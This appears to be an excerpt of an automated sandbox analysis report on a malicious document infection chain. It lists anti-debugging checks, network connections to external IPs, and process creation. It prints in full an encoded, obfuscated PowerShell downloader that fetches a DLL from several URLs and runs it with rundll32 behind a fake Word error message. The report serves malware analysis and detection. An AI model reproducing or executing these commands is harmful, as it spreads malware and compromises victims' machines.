Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E75F0 FindFirstFileW,

17_2_002E75F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000007.00000002.2094842307.000000000032D000.00000004.00000020.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10002460

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_10007528

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10013BFB

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A76B2 mov eax, dword ptr fs:[00000030h]	7_2_002A76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001B6AB2 mov eax, dword ptr fs:[00000030h]	8_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002176B2 mov eax, dword ptr fs:[00000030h]	10_2_002176B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A6AB2 mov eax, dword ptr fs:[00000030h]	11_2_006A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007276B2 mov eax, dword ptr fs:[00000030h]	12_2_007276B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6AB2 mov eax, dword ptr fs:[00000030h]	13_2_001E6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_002276B2 mov eax, dword ptr fs:[00000030h]	14_2_002276B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00686AB2 mov eax, dword ptr fs:[00000030h]	15_2_00686AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_002E76B2 mov eax, dword ptr fs:[00000030h]	17_2_002E76B2

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10004500

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10007528
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10009F26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10006F64

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 167.71.148.58 187

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $F2OMYj = [tYPe]("{2}{0}{3}{1}" -F 'YSte','DIrecTorY','s','M.IO.'); $0SH1g3 = [TYpE]("{3}{0}{2}{1}{4}"-F'ET.','cEpOInTm','serVi','systeM.n','ANaGeR') ; $Wulwywd=(('U'+'fa')+('op'+'v')+'m');$C67yvp_=$Gglh2li + [char](64) + $E2cixhl;$S85adod=(('I'+'fm')+'0'+('n'+'q4')); (ls ('vAria'+'bLe:f'+'2o'+'MyJ') ).VAlue::"cR`E`A`TedIrecTorY"($HOME + ((('4q7Bq'+'pe')+('en'+'6')+('4q7B'+'b'+'s')+('5w_'+'e')+('4q'+'7'))-REpLaCE('4q'+'7'),[chaR]92));$Sluqz8i=(('I'+'kq8u')+'7x'); (Get-vArIABlE ("0"+"SH1"+"g3") -VALueonl )::"sE`c`UriTyproTOc`oL" = ('Tl'+('s1'+'2'));$W7ys3ld=(('B7'+'7v')+('0k'+'y'));$Ka0ekfa = (('Yvtl'+'x')+'6p'+'4');$Hz59g7r=(('Ue'+'r')+('4'+'l1')+'p');$Sn4bxub=('T0'+'_'+('nl'+'9_'));$Pi9nyfq=$HOME+((('BD'+'y')+('Bq'+'peen')+'6'+('BDy'+'Bb')+'s5'+('w'+'_eBDy'))."re`PLaCe"(('B'+'Dy'),'\'))+$Ka0ekfa+('.d'+'ll');$W4rwj98=(('K'+'bhg')+'g'+'9x');$Nm9dctn=NEW-`ob`je`cT NET.WEBcliENt;$Ck81xx2=(('h'+('t'+'tp:J')+((')'+'(3s2'))+((')('))+(('J)('+'3'))+(('s2'+')(big'))+('la'+'ug')+'h'+('s'+'.org')+(('J)('+'3'))+(('s'+'2)'))+'('+('s'+'mall')+'p'+('ota'+'toe')+(('sJ)'+'(3'))+(('s2'+')'))+(('(r'))+(('R'+'wRz'+'cJ)(3s2)(@'+'ht'+'t'))+(('p:J'+')('))+'3s'+'2'+((')(J)'+'('))+('3s'+'2')+((')(jo'+'seg'+'e'+'ne.c'))+('o'+'mJ')+((')(3s'+'2)(t'+'h'))+'em'+(('eJ)(3'+'s2'))+')'+(('('+'gU8J'))+((')('+'3s2'))+((')('+'@htt'))+(('p'+':J)'))+'('+(('3s'+'2)(J'+')(3s'))+(('2)(pa'+'ul'+'s'))+('co'+'mp')+('uti'+'n')+('g.c'+'o')+(('m'+'J)(3s2)('))+('C'+'rai')+('g'+'sM')+'ag'+('icSq'+'uare')+(('J			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1